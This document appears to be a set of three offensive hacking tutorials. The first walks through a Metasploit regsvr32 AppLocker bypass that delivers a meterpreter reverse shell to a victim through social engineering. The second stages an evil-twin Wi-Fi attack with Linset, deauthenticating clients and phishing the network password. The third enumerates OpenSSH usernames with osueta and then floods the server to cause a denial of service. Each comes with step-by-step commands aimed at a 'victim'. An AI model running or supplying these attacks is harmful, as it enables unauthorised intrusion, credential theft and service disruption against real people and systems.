Hack Remote Windows PC using Regsvr32.exe (.sct) Application Whitelisting Bypass Server

This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.

Exploit Targets

Windows 7/8/8.1/10

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Now type use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit (regsvr32_applocker_bypass_server)>set payload windows/meterpreter/reverse_tcp

msf exploit (regsvr32_applocker_bypass_server)>set lhost 192.168.0.124 (IP of Local Host)

msf exploit (regsvr32_applocker_bypass_server)>set srvhost 192.168.0.124

msf exploit (regsvr32_applocker_bypass_server)>set srvport 8080

msf exploit (regsvr32_applocker_bypass_server)>exploit

 

Now, we have to copy the regsvr32 code generated in victim’s run bar on PC using social engineering method.

As soon as we do that, we will get access of victim’s PC.

 

Now type sessions –i  to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

Hack Wifi using Evil Twin Method with Linset in kali Linux

Linset is a tool for Evil twin attack

How it works

Scan the networks.

Select network.

Capture handshake (can be used without handshake)

We choose one of several web interfaces tailored for me (thanks to the collaboration of the users)

Mounts one FakeAP imitating the original

A DHCP server is created on FakeAP

It creates a DNS server to redirect all requests to the Host

The web server with the selected interface is launched

The mechanism is launched to check the validity of the passwords that will be introduced

It deauthentificate all users of the network, hoping to connect to FakeAP and enter the password.

The attack will stop after the correct password checking

First of all download Linset from github with command:

git clone https://github.com/vk496/linset.git

and then change the permissions of the linset script with command:

chmod +x linset

and then execute it with command:

./linset

After execution it will ask to choose the interface so select wlan0 for wireless extension which will put it into monitor mode.

Then it will ask to select the channel so enter 1 to select all the channels.

Now the monitor mode will listen to all the available wifi connections , so wait till your target appears and then press ctrl^c.

Now it will list  all the AP’s with their SSID ,id no. and signal strength , so enter the id of your target and hit Enter as in my case i have selected rajlab by entering 1.

Now select Hostapd by entering 1 which will help in creating Fake AP.

Now hit Enter for using default path to save the capture file or you can give the custom path to save the capture  file which will ask to select the method for cracking the handshake so select 1 for aircrack-ng.

Now select 1 to de-authenticate all the clients connected to the target AP to capture the handshake.

Now when the handshake is captured you will see it on right top corner of the new window and then enter 1 on the menu window as we have captured the handshake. 

Now select 1 for web interface which will be presented to the victim when he will connect to our fake AP.

Now it will ask for language selection of the web interface so enter 1 for English.

Now 4 terminal windows will be opened of which one will create the Fake AP , one will be regularly de-authenticating all the clients and one will  show all the info of the AP.

Now as you can see there are 2 rajlab AP are present of which one is fake and open and the other is the original but the clients will not be able to connect to the original one due to our deauth attack so they will be forced to connect to our fake AP.

After connecting to the Fake AP it will redirect the victim browser to below given web-page which will require the victim to enter the  original AP password as the attack will only stop when the victim will enter correct password.

After submitting the correct password , the attack will be stopped and a message will be generated that your connection will be restored .

As you can see in my case victim entered the correct password and we found the correct key as:

KEY FOUND! [ raj123987 ]

OpenSSH User Enumeration Time-Based Attack with Osueta

OpenSSH (also known as OpenBSD Secure Shell) is a suite of security-related network-level utilities based on the Secure Shell (SSH) protocol, which help to secure network communications via the encryption of network traffic over multiple authentication methods and by providing secure tunneling capabilities.

OpenSSH was designed to evade various attacks like MITM , eavesdropping by encrypting all the traffic but an attack known as User-Enumeration Time Based Attack was discovered which helps in effectively increasing the brute force attack efficiency by guessing the usernames firsthand as in a Brute Force attack two fields are required Username and Password and we will be able to guess the Username correctly thus decreasing the time required for Brute Force Attack as of now only Password field is to be Brute Forced.

Osueta a simple Python script was developed to exploit the OpenSSH User Enumeration Timing Attack.(found in 5.* and 6.* versions of the *nix systems)

HOW THIS WORKS??

When we want to connect to a SSH server we have to provide a Username and a Password so first it is checked if the Username exists or not then:

1.) If the Username doesn’t exist the password is not compared to original one.

2.) If the Username exist the password is compared to original one by comparing the hash of the given password , if it is correct you are granted access .

3.) Now suppose a username exists and we are using a very long password suppose of length 40000 bytes which is the default length used by osueta  (like 40000 S) so the hash of the given password has to be generated to compare it with the original one as a result the system slows down and the time measurement is increased which is the key as it tells us that username exists.

First clone the github repo with the terminal command:

git clone https://github.com/c0r3dump3d/osueta.git

Now change your directory to osueta and run the following command:

python osueta.py –H 192.168.222.136 –U pp –p 22

-H (Openssh server host i.e. victim IP -192.168.222.136 in my case)

-U (any guessed username which can be present on the victim machine – pp in my case)

-p (port no. of the running ssh service – 22 in our case )

Firstly it checks if the given port  is open or not and then service banner is detected to know the version of the running ssh server.

Now it generates 10 random usernames to try against the target server to test the time measurement of the server i.e. test the delay time of the server . After that it test the server with provided username and if there is delay in user authentication then the user exist as in my case the user pp exists on the target server

We can also pass a list of users as the input to check against all the usernames in the list with command:

./osueta.py –H 192.168.222.136 –L users.txt –p 22

-L (users input file –users.txt in my case)

As in my case it has successfully enumerated the following username from the given list

pp

root

him

We can also create a DOS(Denial Of Service) like situation on the target server with the command:

./osueta.py –H 192.168.222.1376 –p 22 –U pp –v no --dos yes

--dos (if you want to create a DOS situation -yes)

Now firstly it will detect if the given user exists if yes then it generates a lot of connections to the target server and when the number of sessions is reached the target server starts to reject the rest of the connections causing a DOS.

As you can see the target server is denying any connection when i try to connect with it.